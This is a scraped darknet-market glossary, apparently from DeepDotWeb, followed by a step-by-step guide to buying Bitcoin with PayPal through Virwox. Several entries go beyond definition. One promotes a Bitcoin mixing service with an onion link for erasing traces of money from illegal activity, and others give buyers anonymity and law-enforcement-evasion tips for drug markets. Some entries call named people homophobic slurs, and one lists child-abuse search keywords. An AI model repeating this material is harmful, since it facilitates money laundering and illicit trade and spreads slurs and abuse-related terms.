LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k =E5+y -----END PGP PUBLIC KEY BLOCK----- If not you, who? If not now, when? _ _ _ ____ _ _ | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | _ | (_| | (__| < | |_) | (_| | (__| <|_| |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

    DarkNet Dictionary!

    For those of you that are just beginning with the DarknetMarkets, we have compiled a list of the terms you might come across while browsing around including links to important resources, have any term that is missing here?  let us know! something needs fixing?  contact us! or leave a comment, Thanks to the redditors / mods who helped us compile this list, we will keep it growing and updating.

    3DD – 3 Day delivery.

    420 – From wikipedia: is a code-term used primarily in North America that refers to the consumption of cannabis and by extension, as a way to identify oneself with cannabis subculture or simply cannabis itself. Observances based on the number 420 include smoking cannabis around the time 4:20 p.m. (with some sources also indicating 4:20 a.m

    4/20 – 20th of april sale – also known as the special sale when the vendor Tony76 executed the most famous Scam on Silk road.

    Administrator – In charge of a collection of services a year or two ago, including TorStatusNet, Hidden Image Board, a hosting service.

    Altcoin – Any digital cryptocurrency other than Bitcoin, altcoin – any digital cryptocurrency other than Bitcoin.

    Anonymity – This thing you want to have if you dont want to be found while using dark net markets.

    AnonFiles – File upload site. You want to send a PDF/image/whatever to another user? Upload it to anonfiles, then you can share your custom link, and whoever you send it to can download your file anonymously.

    Astrid – Creator and Moderator of /r/DarkNetMarkets, very promiscuous has had relations with all Moderators there, also is the CSS guru!

    Avengers – A group of individuals who are well known for ordering LSD from many vendors back in the day of Silk Road 1.0, reagent testing it, consuming it, a writing reviews about the quality of the products. They currently can be found on the deep web on the Majestic Garden forum.

    AYB – All You’re Base, general Onionland portal

    AYW – THW without the CP. Known formally as All You’re Wiki. Most people use it now.

    Backopy – The Administrator of Black Market Reloaded (BMR)

    Bergie Web – The level of the internet hierarchy that comes between the “surface” and the “deep web,” if you are comparing the internet to an ocean. This includes porn, chans, and other sites that provide you with information on how to access the deep web. Peer-to-peer file sharing networks are also part of this level.

    Bitcoinfog – “Wash” your bitcoins. Bitcoins can be traced, so let’s say you received bitcoins from an illegal activity, those coins can be traced back to you if you use them on another website that is linked to your real identity (localbitcoins, paypal, bitstamp, MtGox etc). This handy website will erase all traces on your coins. the service is accessible here:  http://fogcore5n3ov3tui.onion

    Bitcoins – an open source, peer-to-peer payment network and pseudo-anonymous digital currency being used for almost all transaction on the darknet.

    Black Market ReloadedAlso known as BMR,the oldest dark net market since Silk Road was shut down, the site is currently offline and planned to be back with a newer version.

    BlockchainWikipedia Definition: A block chain is a transaction database shared by all nodes participating in a system based on the Bitcoin protocol

    BotDW – Boss of the Deep Web

    Buyers Markplace user that is not a vendor. (duh)

    Carding – The practice of stealing and selling credit card information

    CD (Controlled Delivery)The technique of controlled delivery is used when a consignment of illicit drugs is detected and allowed to go forward under the control and surveillance of law enforcement officers in order to secure evidence against the organizers of such illicit drug traffic.

    CirrusA silk road forum moderator.

    Chisquare/psi – Hugest faggot, avoid him more. Hosts numerous services. (Its not us who said this!)

    Cipherspace – tor hidden services / i2p / freenet / any other anonymity network

    Cold Storage – a secure offline wallet for your Bitcoins or other cryptocurrencies

    CPWhen mentioned in the context of the deep web – it usually mean Child pornography, something you should know and avoid at all cost when browsing around.

    Clearnet – regular internet (non TOR)

    CryptographyAll the means of hiding and encrypting the data that you send over the internet.

    Crypto News – (http://wittvywowuxp35s6.onion) is a hidden service for news about privacy,security,politics and technology. The owner only updates sporadicly and focuses a lot on I2P.

    Dark Net – A general term that describes the hidden websites hosted on the TOR / I2P and other networks that you cannot access with regular internet connection without using some special software or get crawled by Google and other search engines. more info can be found here

    Dark Nexus – HTTP Refresh Chat

    DarkNetMarketsA sub Reddit meant for the discussion of the various Dark Net markets, can be found at this link.

    DDOS Attack – Denial-of-service attack Form of an attack that is an attempt to make a machine or network resource unavailable to its intended users, was common on Silk road, some say it was used to locate the server location using a know tor vulnerability. Read the Wikipedia page for the technical explanation

    DBAN – Darik’s Boot and Nuke software for wiping you harddrive from all information.

    Deep Web – Synonymous with “Dark Net”.

    DeepDotWeb – Us! The site where this list was created, can be found here: http://www.deepdotweb.com A Blog focusing on deepweb news.

    Defcon – The alias of Silk Road 2.0 Admin. A person named Blake Benthall who was arrested During Operation Onymous is alleged to be him.

    Dispute – In our context, this term is usually used to describe a disagreement between a buyer and a seller on the markets.

    Digitalink – a/k/a Jacob Theodore George IV, according to Homeland Security Investigations (HSI) Digitalink was the first vendor on Silk Road selling illegal drugs to be arrested.

    DoD / Coachella / HH (and some others) – A Well known scammer & troll, was eventually doxxed on some article and was not seen much since.

    Domestic – A term that refers to making an order from a vendor the resides on the same country as the buyer.

    Donations – You will encounter many requests for them on the darknet markets, will usually list a bitcoin address.

    Doxx – The act of posting in a public forum the personally identifying information of a pseudonym used by an individual or the information posted therein.

    Dread Pirate Roberts – The pseudonym used by the administrator of the original Silk Road market. It has been speculated that more than one person may have been using this pseudonym, but “Ross William Ulbricht” has been indited by the FBI as being the sole owner.

    DDG/Duck Duck Go – A search engine that respects privacy.

    Emergency BTC Address — An address to be held on record to send all funds to in case of a market shutdown. This would ideally be a cold storage address with no information that could be used to connect the owner to their identity. This address would only be checked after a market was shut down in order to recover outstanding funds.

    Encryption — Using secret information to make it infeasible without knowledge of said information to decipher the ‘cypher-text’ produced into a plain text message. This can take one of two forms, symmetric encryption which used a shared secret that both parties must know in advance, or public key cryptography where the information to encrypt the information differs from the secret needed to decrypt the information.

    Escrow – the use of a neutral third party to ensure that a transaction payment will be made to a seller on completion of items sent to a buyer. Generally after a purchase is made, the funds are held ‘in escrow’ to be released when the buyer states the seller has met the terms of the purchase. Generally the third party will also offer arbitration in case of a dispute between the two parties.

    Electrum plugin – Used on The Marketplace to create multi signature transactions with a click of a button – full usage instructions can be found in this tutorial.

    Exit Scam – A term used to describe a situation where a market admin or a vendor wants to retire, and is doing so while taking as much money as possible from their users / buyers.

    • Vendors: usually by offering some great deal and abusing the reputation they gained so far by requiring people to not use the escrow protection and collecting as much money as possible (without sending out anything) before shutting down the store and running with as much BTC as they can.
    • Market admins: usually locking users funds on the market, just to shut it down completely soon after.

    Fagmin/dgft – New Admin Of Torchan

    FBI – the Federal Bureau of Investigation. This is the USA’s state-wide police who prosecute violations of federal laws. They do not involve themselves in violations of state law.

    FE  -Finalize early. This is the release of escrow funds before the seller knows that the conditions of the contract have been met. This is used to reduce seller risk from BTC price fluxuation, and against market shutdown. This is also used to scam buyers as after the escrow has been released there is no recourse for the buyer if the seller does not deliver on their promises.

    Feedback — a message left from a seller to the vendor, or vice versa, about how well a transactions went. It is considered good form to not reveal any information about the methods the seller used to ship the order nor the vendor’s or seller’s location or details. This is made publicly available to allow users of a site to determine if they should trust the vendor or seller

    Flush (Curtis Green) — An individual the FBI accuses Dread Pirate Roberts of ordering to be murdered. This person is also accused of being ‘Chronicpain’ from the Silk Road Forums, and an employee of Silk Road. The details of the allegations can be read – Here, here & This is a great resource.

    Freedom Hosting – Huge free web provider. Some of its services hosted child porn. Busted by the feds around the same time SR was busted. SR also was hosted on it for a while before it switched to a dedi server.

    Freenet – a peer-to-peer platform for censorship-resistant communication.

    FUD – Fear, Uncertainty and Doubt

    Galaxy Deep Web Social Network –  (http://hbjw7wjeoltskhol.onion/) is the currently most active dark net chat, a great place to keep in touch with friends and vendors, share the newest FUD and fuck up your OPSEC while waiting for your order to be shipped.

    Gawker — an online blog that reports on web trends. Notable for being one of the first major sites to report on the existence of the Silk Road on 2011-06-01 at http://gawker.com/the-underground-website-where-you-can-buy-any-drug-imag-30818160

    GCHQ – British Government Communications Headquarters, equivalent to the NSA in the United States.

    Grams –  Cross Marketplace search engine for the DeepWeb (see the sidebar link here)

    HackBB – Famous hacking phpBB board, also hosted downloads for files like zeuS.

    Hard Candy – Infamous page on Hidden Wiki for child porn.

    Harry71 – Onion Spider Robot (http://skunksworkedp2cg.onion/) is a daily updated extensive list of Onion sites. The owner runs a crawler that checks if the sites are up, fetches the link and title and dumps it on his homepage.The site also contains some statistics about uptime and hosts.

    Hidden Service – Another term for a .onion domain name. It can only be accessed through the Tor network, and cannot be seized by a government.

    Honeypot – A hidden service or other website setup by law enforcement in attempt to attract and trap people who participate in illegal activities. Other cited uses include helping the military and government protect their secrets and the FBI defending large businesses.

    Hushmail – An email provider that focuses on privacy and used industry standard protocols PGP and 256-bit AES encryption. It claims to be secure to the extent that not even company employees can read the contents your emails. Hushmail is known to cooperate with law enforcement by handing over encrypted emails.

    Hidden Wiki – a ‘hidden service’ website on the Tor anonymous network that allows for open editing of subjects related to hidden services and activity in them. “You will never find a more wretched hive of scum and villainy. We must be cautious.

    Hub Forums – An Onion based platform for cross marketplace discussion, like DNM sub reddit, but forum based and fully anonymous – read the details here.

    I2P — The ‘Invisible Internet Project’. Originally designed as a way to be able to use IRC anonymously, it has become one of the more popular anonymous networks. While similar to Tor, key differences include the fact that I2P focuses on gaining access to sites within the network, and not to the Internet at large. Not as much academic research has been done on this project as Tor. This service is very popular in Russia. About half the routers appear to be located there. Details can be found at https://geti2p.net

    International – Outside of one’s own country. Some avoid international transactions because customs adds time and risk to an order. Some countries such as Australia are known for having customs that are extremely hard to get an order past.

    ISP –  Internet service provider.

    IRC – Internet Relay Chat. A communication system allowing easy transfer of messages in the form of text. It is intended for group discussion in sessions called channels.

    JB – See hard candy, except for teens.

    Lavabit – A defunct email provider that shut down in August 2013 after being forced to hand over its SSL private keys to the US government.

    LE / LEO’s / LEA’s –  Law Enforcement / Law Enforcement Officers / Law Enforcement Agents

    Library – Usually refers to Tor Library, the largest centralized eBook service on the Darknet.

    Libertas — Pseudonym used by one of the original Silk Road forum administrators, and also used by one the administrators of Silk Road 2. Arrest by thr ‘Garda Siochana’ (irish police) Details of the arrest may be found at this link.

    Liberte – Another Linux distribution similar to TAILS and Whonix with the purpose of enabling anyone to communicate safely and covertly in hostile environments.

    Litecoins — an alternative cryptocurrency, similar to bitcoin. The key difference is that while bitcoin uses hashcash-SHA256^2 at the ‘proof of work’, litecoin uses hashcash-Scrypt which is designed to use more memory and be less subject to custom hardware designed to solve the problem quickly. More details of this difference may be found at: https://en.bitcoin.it/wiki/Hashcash

    LocalBitcoins — an site designed to allow over the counter trading of bitcoins. Famed for it’s anonymous nature people who sell on the site have been under constant pressure to avoid being prosecuted as unlicensed money traders. This extra risk and the extra work generally cause a significant price difference between the site and a more open (and regulated) exchange.

    Love Letter – An official confiscation notice from the postal service sent to the recipient letting him know that his parcel was seized.  In some cases, vendors sent fake love letters to create the false impression of a seized package and scam the buyer.

    Lucyskyhigher  – Reddit mod sexiest biotch on the always informative and largely humorous gathering place for all darknetmarkets, /r/Darknetmarkets

    Marco Polo Taks Force – A multi law enforcement agency task force based in Baltimore put together to investigate to investigate Silk Road and eventually included investigators from the FBI, DEA, DHS, the IRS, U.S. Postal Inspection, U.S. Secret Service, and the Bureau of Alcohol, Tobacco, Firearms and Explosives

    Mariana’s Web – Urban legend of a secret website in the deepweb.

    Marketplaces – catch all term for web sites set up to allow trade between vendors and buyers. When used in the context of sale of illegal goods, these usually provide anonymity to the buyer and seller, a method of escrow to ensure to reduce risk from new vendors and sellers, and a method of advertising goods to be sold at a price so that a purchase may be initiated and paid for without involvement of the seller. Most markets are also set up as ‘hidden services’ under anonymity networks like tor, i2p, or freenet, although there do exist some ‘clearnet’ markets that operate over standard HTTP/HTTPS.

    Mixie – First major service operator on Tor in 2007. Services include a basic message board on the home page, a PM service, a “create your own bbs-like board” system (anyone could create a community for free) called SnapBBS, and a few more features. Also hosted an OnionNet IRC server.

    Molly – any damned thing you can shove into a gelcap and get somebody to buy. In theory, this is supposed to be MDMA in the gelcap, but more commonly you get something like methylone, BZP, a benzofuran, talc, or something potentially toxic like PMA. Test first before consuming, http://dancesafe.org/health-and-safety/adulterant-screening-kit-instructions is a good resource.

    Monero – a newer more privacy focused cryptocurrency that’s being accepted by some darknet markets.

    MSM – Main Stream Media — Big news outlets designed for common consumption by the masses. These can range from more neutral sites like the BBC in the UK, Al Jazeera in the middle east, or The New York Times in the USA, to sites like the Daily Fail, Fox News, or Pravda which are not as known for being well vetting their news articles.

    MtGox – Magic: The Gathering Online exchange. One of the first public exchanges for bitcoins to currencies such as USD. Because it was designed in haste, it has been plagued with issues of security. Widely considered to be completely insolvent, a lack of transparency has allowed constant rumour to circulate. They are no longer taking exchanges after claiming to be defrauded by outside parties taking advantages of quirks in the bitcoin protocol.

    Multi Signature Escrow – Where an address is signed by both the buyer and the seller with their private keys. The buyer will send funds to the address and the seller ships the product. If both parties are happy they sign off on the address and release the funds in escrow, You can see example for such open source service here.

    Nameless – IRC server hosted by chi. No identities, all usernames randomly generated.

    Nekro – Huge faggot, avoid him. (he said this, not us!)

    MTLjohn – Was a funny Scammer on SR1 , kept popping again and again under different identities just to be exposed each by another vendor (LuckyLuciano) since he was so easy to provoke.

    NDD –  Next day delivery.

    Onion – a hidden website using the Tor network. Name comes from the ‘onion routing’ used by tor. The url is composed of a hash of information used to identify the correct system, so most addresses are somewhat random. While creating an onion is easy, and the routing itself has few known weaknesses, securing such a site to leak no information is exceptionally difficult.

    Onion Browser — A web browser like the Tor Browser Bundle (TBB). A web browser designed to work with the tor network to browse hidden services and normal websites anonymously, without leaking user information. While easier to use properly without leaking information, bugs in a browser can cause serious problems, such as the javascript bug that was used in part to shut down Freedom Hosting.

    OnionForum – The original forum for Tor created by Legith in the early days of ’05.

    Onionland – A general term to describe tor hidden services

    OnionNet – First real IRC network designed for Onionland. All IRC ops are pedophiles though. Long history but not many people use it anymore.

    Onion Routing – A technique for anonymous communication over a computer network. Messages are repeatedly encrypted and send through multiple network nodes. The process is comparable to peeling an onion, each node removes a layer of encryption uncovering routing instructions for the following layer.

    Onion patch –  A saying for using the dnms on /r/drugs.

    opDarknet – Campaign launched by Anonymous a couple years ago. Targeted child porn sites as well as Freedom Hosting.

    Operation Onymous – A global crackedown on the darknet markets during November 2014, in which many sites were seized and several people arrested.

    Optimus Crime/OC – Admin of HackBB.

    OPSEC – Operation Security. The process of protecting little pieces of data that could be grouped together to form a bigger picture, or expose your identity.

    OrBot – a mobile version of the tor router for Android. Can be found on the Google Play store. Designed to either work with it’s own browser, or can be set up to work as proxy for any system that supports it. Can also be used on a rooted device to provide a transparent proxy that will force all apps to use tor for connecting.

    OS –  Operating system.

    Pastebin – A website used to store text for a certain period of time. It is popular on the deep web because it is an easy way to anonymously share information.

    Parallel construction – Parallel construction is a law enforcement process of building a parallel – or separate – evidentiary basis for a criminal investigation in order to conceal how the investigation began.

    PGP/GPG – Pretty Good Privacy/ Gnu Privacy Guard. PGP was introduced in 1991, and was formalized with RFC 2440 and RFC 4880. Uses a combination of public-key and symmetric-key cryptography to ensure that messages can be delivered without a third party gaining access to the contents of the message. It also allows for a message to be signed so that the author of the message is indisputable. Many different algorithms can be used for the encryption, but the most commonly used methods are RSA for the public key crypto, and AES for the symmetric cypher. It is extremely important hat the public key of any party be fully verified in order to know that the message is being delivered to the correct recipient or is from the correct sender. Here we have a simple usage guide for windows.

    P2P Escrow – Most commonly used to refer transactions using ‘P2SH’ addresses as defined by BIP 016. A public key is provided by a seller, market, and vendor, and used to create an address which requires two of the three parties to sign in order to redeem. The buyer than pays to this address. Of extreme importance is the ‘redeemScript’ which details the information needed to redeem funds send to the address, which is a hash of the redeemScript. The goal of this method is that no one party has enough information to take funds from these P2SH addresses. Even if the market is hacked or taken down, the funds cannot be seized, and a buyer and seller can, with the redeemscript, finalize a transaction outside of the market’s involvement if they choose to.

    Phishing – the act of using social engineering techniques to get private information such as user names and passwords. An example would be to send out a message claiming to be from an administrator asking for a password, or setting up a fraudulent website that a looks to be well know market’s site in order to gain user name and password information.

    Pidgin OTR – Secured instant messaging software Pidgin is a free and open source client that lets you organize and manage your different Instant Messaging (IM) accounts using a single interface. The Off-the-Record (OTR) plug-in designed for use with Pidgin ensures authenticated and secure communications between Pidgin users.

    PIN Code – Personal Identification Number Code. Uses as a secondary validation method to protect against loss of funds if the username and password are discovered. Generally it is only asked for during transfer of funds to outside the market or to confirm and finalize orders.

    PM / DM –  Personal message/ DM: Direct message.

    Processing Time – time required by a market or vendor in order to complete a transaction. Generally this involves waiting for sufficient confirmations on the blockchain to ensure a deposit has been met, or to run funds through a bitcoin mixer on the market. Also used to for time required by a vendor once getting a transaction to put the goods into the post.

    Project Black Flag – Market set up shortly after the fall of the original Silk Road. Widely suspected to be a scam, this was confirmed to be the case after a short period of time.

    Proxy – Unlike a VPN, a proxy is a service that only changes the IP address websites can see within your web browser, rather than on all applications on your computer.

    RAT (Remote Administration Tool) – A piece of software that allows a remote operator to control a system as if he has physical access to that system.

    RC (Research chemicals) – From wikipedia, Research Chemical are chemical substances used by scientists for medical and scientific research purposes. One characteristic of a research chemical is that it is for laboratory research use only. A research chemical is not intended for human or veterinary use.

    Resolution – Used when there is a dispute between a buyer and seller. This usually involves whatever market used to serve as an arbitrator to determine how funds are to be released from escrow.

    Reviews – the corpus of feedbacks left on a site, along with more information information gained by outside channels. Used by buyers to determine if they should take a vendor or buyer as legitimate.

    Riseup / Safe-mail – Excellent e-mail services.

    Ross Ulbricht — Accused of the FBI of being the sole owner of the pseudonym ‘Dread Pirate Roberts’ and creator of the Silk Road. He was an Eagle Scout and in a known libertarian. The original Silk Road website went down after his arrest.

    RTS – Return to sender.

    Shadow Web – A mythical part of the dark web that’s been perpetuated by creepypastas. Supposedly allows you to access an even darker network containing red rooms and cannibalism forums.

    Same Same But Different (SSBD) –  Peter Phillip Nash,  Was arrested and accused in Australia for being on the Silk Road moderators You can read the full details about the moderators bust in this post.

    Samples – In the context of a market, a free or low cost item sent to a well known buyer in order to establish legitimacy. This proves that at least the seller has access to a product and is capable of delivering it in as secure way. The receiving party is expected to leave public feedback regarding the quality of the products and how well it’s been packaged.

    Satoshi Nakamoto – A pseudonym of the person or group of people who created Bitcoin and anonymously published its source code.

    Shared Send – A free method to tumble Bitcoins provided by blockchain.info. It routes transactions through a shared wallet breaking the chain of transactions.

    Scammer – One who would attempt to defraud either a vendor or seller. For a vendor this can take the form of simply not ever sending products, sending poor quality or misrepresented products, or ‘selective scamming’ (See other entry).

    Selective Scamming– Where known individuals are send product but large transactions or those from unknowns are not sent out. For a seller, this will mean that they claim to have not received goods that were delivered or that the goods were of poor quality/misrepresented.

    Search (ability you must have) = http://lmgtfy.com/?q=search

    Sheep – Second big online market to fail. Vendors flocked to the site citing it’s well polished vending design, and users followed. Disappeared without a trace taking all funds in escrow with it. Despite the manhunt that followed, it remains unclear if it was a deliberate scam, a result of being hacked, or a combination of the two.

    Shipping – Process of a vendor packaging and sending goods. A source of extreme difficulty for vendors, and how many have been caught. Ideal methods will appear be legitimate business to individual packages and correspondence. It is considered poor form to disclose any specifics of a shipment made, as it could be used to target a vendor.

    Shilling – Creating accounts on Reddit / Forums for the sole intention of posting Positive / Negative post about someone or something while trying to make them look authentic.

    Silk Road – ‘The ebay of illegal goods’. First reported to a wide audience by Gawker 2011-06-01, it flourished due to a large vendor and user base, and strict controls to weed out scammers. Taken down after the arrest of Ross Ulbricht at the start of October, 2013. While it was not the first nor the last market for illegal items, none have matched it’s popularity and trust level given by vendors and users.

    SIGAINT – Tor-based darknet email service that allows you to send email without revealing your location or identity.  Its name is derived from SIGINT (“Signals Intelligence”), which refers to intelligence-gathering by interception of signals.

    Silk Road 2.0 – The successor of the first Silk Road. Was seized during Operation Onymous, and Blake Benthall the alleged admin of the site (Defcon) was arrested.

    SMAC – a tool that can change your MAC address

    SMS4Tor – Self-destructing messages. Similar to Privnote but for Tor. I prefer this because it’s an onion address AND does not require javascript (Privnote requires JS). You type out a message on their site, create a custom link, and share it to another user. The link will only work once, and so whoever opens it first is the only one who can read it. A great alternative to PGP as it is much more user-friendly. Very secure when  combined with PGP encryption. *This one’s a little harder to find but if you google “self destruct message tor” you should be able to find it.

    Stats (Buyer) – statistics used to determine legitimacy of buyers/sellers. Common are number of successful transactions, average reviews, and dollar amounts of successful transactions in total. These are usually imprecise in order to avoid anybody being profiled.

    Stealth – Methods used by vendors during packaging to make them blend in with normal mail. Disclosing any particular method of stealth is considered extremely poor form. Examples of stealth methods include making the item appear to come from a legitimate, known business; hiding the product in another, nondescript looking item; and using moisture barrier bags or mylar to eliminate product odor from being emitted from the package. Ideally, you would be able to open the item and give a cursory inspection of all the contents and find nothing unusual, but in practice this can vary greatly.

    Sub Reddits – one of the subforums from the popular reddit.com community. Many times shortened to r/subredditname in common discussion. A team of administrators that are usually not affiliated with reddit determines the content policy of the sub reddit, with the website taking a very hands off approach.

    SQL injection – An database code injection technique, used to attack data driven applications in which malicious SQL statements are inserted into an entry field for execution, many markets got shut down or lost their money because of this type of attack.

    Tails – Are you using just Tor Browser Bundle? Then consider TAILS, it’s an operating system specially made for anonymous activities that you boot from a CD or usb stick. It leaves no traces on your computer and has plenty of built in tools that come in handy.  *Check out their website, search “Tails boum” and you should find it very easily.

    Talk.masked/core.onion – 2 of the first major forums in Onionland besides Onionforum.

    The Marketplace (i2p) – Market set up on the I2P network. Defined by use of an alternate anonymity network and the use of P2SH addresses to hold all funds in escrow during the ordering process. Tends to be either praised for its security or derided for the bugs and non-intuitiveness that it’s model provides. You can find full usage guide here.

    Tony76 — Was a trusted vendor on SR1, than ran a massive “FE” scam you can read the full story here, The FBI accuses DPR of placing a hit on the individual using this pseudonym. He scammed a large number of Silk Road users, but his true identity and the details of if he was killed or not are still in dispute.

    Tor – The Onion Router. Uses ‘onion routing’ to provide anonymous access to the Internet by encrypting a message several times with each relay removing one layer before the final destination is reached. Funded heavily by the US government, it’s security has been a focus of much academic research with no serious known issues or backdoors that have been discovered yet. Used by journalists, government censors, and more to hide their true location and identity.

    Torchat – IM service that works by having each user set up a ‘hidden service’ that can be used to contact them via Tor. Somewhat similar in purpose to OTR, but messages do not have plausible deniability.

    Torch – Tor Search Engine (http://xmh57jrzrnw6insl.onion/) is your light in the dark net. Make sure to bookmark it if you want to wander the depths beyond your favorite markets.

    Tormarket – Another market to rise and fall after SR’s demise. Not as big as Sheep, but the timing made many very cautious about the reliability of new markets.

    Tormail – Tor Mail was a Tor hidden service that allowed to send and receive email anonymously, to email addresses inside and outside the Tor network. The service was seized by the FBI as part of the Freedom Hosting bust in August 2013.

    Tor Browser Bundle (TBB) – A modified version of Firefox that allows people to easily use the Tor anonymity network. It is compatible with Windows, OS X, and Linux.

    Tor Exit Node – The last relay that data traveling from its originator (a computer) to the recipient (a web server) travels through before reaching the recipient. To the recipient, traffic appears to originate from the exit node.

    Tor Node – A data relay, either a connection point, a redistribution point (middle node), or an endpoint (exit node).

    TS/LS/OPVA/pthc/PB/ptsc/petersburg/anything relating to a child/swirlface/[email protected] – AVOID. CP keywords.

    Tumble – a method to anonymize the source of your bitcoins.

    TrueCrypt – Open source application used to encrypt storage devices such as hard drives and USB flash drives. It is also used to create encrypted virtual disks contained in a file that mount similarly to real storage devices.

    Tx ID – Bitcoin transaction ID

    Utopia marketplace – Market that had some connection to BMR (altho the nature of the connection is somewhat unclear). Had the advantage of being fully stocked with former BMR vendors at its public launch. Rapidly taken down by the Dutch police not long after it was unveiled to the public.

    Vendors – Those who sell product on a market. This may be of an illegal nature, semi-legal nature, or completely legal nature. Because a vendor will be given a buyer’s full information to send the product to, any new vendor is under heavy scrutiny of being a scam or a ‘honeypot’ set up by law enforcement. Because of the difficult nature of the work, quality vendors tend to develop a cult following.

    Vendors Roundtable – A vendor only discussion forum on Silk Road 1/2 forums. Used on a site to allow vendors to bring up issues about the market or buyers without raising alarm in the general populace.

    VPNVirtual Private Network. In the context of anonymous activity, this is usually a proxy that purports to be anonymous in nature to hide the end user’s identity. Generally either used to hide the fact that one is connecting to a anonymous network like Tor, or to hide the fact one is using an anonymous network like Tor (as many websites will block Tor outproxies). A VPN does not provide true security as there is no way to know if the operator is keeping logs.

    Whonix – (http://zo7fksnun4b4v4jv.onion) is an Debian based operating system focused on anonymity, privacy and security by isolation. Whonix consists of two parts: One solely runs Tor and is called Gateway. The other, the Workstation, is on a completely isolated network. Only connections through Tor are possible.

    Whistleblowing – The disclosure by a person, usually an employee in a government agency or private enterprise, to the public or to those in authority, of mismanagement, corruption, illegality, or some other wrongdoing.

    ZULU Time – UTC-0 Western European time zone.

    Buy Bitcoins With Paypal!

    Paypal is one of the most trusted and popular services for online transactions these days. Paypal is everywhere now, as many merchants and traders have adopted it with open arms.

    Bitcoin is another method of conducting online transactions, which has carved out its own place in the market. Bitcoin is a decentralized, digital currency, with a fixed supply, that reduces the need for using physical or hard money.

    On one hand, Paypal makes online, fiat transactions fast and easy. On the other hand, Bitcoin is both a currency and payment system that operates independently of the fiat monetary system, thereby making online purchases more like an equivalent of cash purchases in the real world—whereas Paypal is merely an intermediary between the Internet and a Physical bank.

    The speed, security, and convenience of Bitcoin has of course created an ever-increasing demand for the digital currency. As a result, online Bitcoin exchanges—a popular avenue for buying and selling bitcoins—have popped up in droves.

    However, one may ask the question: can I buy bitcoins using Paypal, so I do not have to directly link my bank account to a Bitcoin exchange? Yes, here’s how:

    Successfully Buying Bitcoins With Paypal

    Many people who have used Bitcoin and Paypal say that using Paypal to buy Bitcoin is a very difficult process. If we take a glance at the previous track record of buying Bitcoin via Paypal, we will see that people have indeed faced many inconveniences with Paypal. These difficulties arise due to recurring situations where a person uses Paypal to buy Bitcoin, and then initiates a chargeback, in which the person claims to never have received the bitcoins, and demands a refund from the Bitcoin seller. It is said that Paypal often favors fraudulent merchants, so most Bitcoin traders expect this system to be dangerous with a high chance of having their money stolen, and may opt to refrain from purchasing bitcoins through Paypal.

    It is possible to successfully use paypal to buy bitcoins, though, and sell them for a higher prices through online marketplaces, such as LocalBitcoins and eBay. There are two methods that will allow one to buy bitcoins with Paypal: Virwox or credit cards. Virwox charges a commission fee for using its services, but it is, by far, easier to buy bitcoins through Paypal with Virox than by using a credit card. Therefore, we will show you how to use Virwox to successfully buy bitcoins through Paypal.

    How to Buy Bitcoins With Paypal by Using Virwox

    We have Created a tutorial to explain the Virwox method—here is a general overview of the steps you will have to take to use this process:

    Visit the website Virwox.com
    – Register for an account on that website.
    – Then, add funds to your Virwox account via Paypal
    – Buy Linden$ (SLL) with USD/EUR
    – Buy bitcoins with your linden$ (SLL)
    – At least send your Bitcoin to your wallet.

    *Note: Linden$ is the virtual currency used in the online game, “Second Life”
    Step 1: Visit the official website of Virwox and register for an account. You need to ignore the message, “your avatar connection has not been validated yet.”

    Click Here To Buy Bitcoins with Paypal & Credit Cards using Virwox.com >>

    Virwox Home

    Step 2: Click on the “Deposit” button on the sidebar:

    2-virwox-deposit

    Step 3: Choose how you want to deposit your money—you can use Paypal or Credit cards using Skrill payment. Note that you can only deposit limited amounts of money every 24 hours. Your 24 hour deposit limit will be raised as you complete successful transactions. A failed transaction will still be deducted from your daily limit, so be careful with the details enter while preparing your Paypal or credit card payments.

    2A-Deposit

    Step 4: Once you finish your deposit, you need to convert the USD or EUR to SLL. Just click the “place a sell order” button or click the USD/SLL button on the sidebar:

    3-convert-tosll

    Step 5: Choose how much USD you want to convert to SLL and click “Next.”

    4-buysll

    Step 6: After Clicking “Next,” you need to confirm your order.

    5-place-order

    Step 7:  After you have converted your USD to SLL, all that is left to do is to convert the SLL to BTC. To do this, Just click on the “BTC/SLL” button on the sidebar.

    6-convert-to-BTC

    Step 8: On the next screen, enter the mount of bitcoins you want to buy using your SLL.

    7-convert-to-BTC2

    Step 9: After your transaction has been confirmed, you will be able to withdraw your bitcoins and send them to your wallet; click the “Withdraw” button on the sidebar.

    8-withdraw

    Step 10: Enter the amount of bitcoins you want to Withdraw, then enter your Bitcoin address and click the “Request Withdraw” button. Note: on your first time there, may be a 48 hour delay until your bitcoins are sent to your wallet. This delay is placed to help prevent fraud. After your first transaction, though, the withdrawal will be instant, and it can be traced in the Blockchain.

    9-withdraw-btc

    In conclusion, this method is the easiest way to buy bitcoins using paypal and credit cards; the only disadvantages are the fees (Papal fees, Lower rates for BTC & SLL).

    Click Here To Buy Bitcoins with Paypal & Credit Cards using Virwox.com >>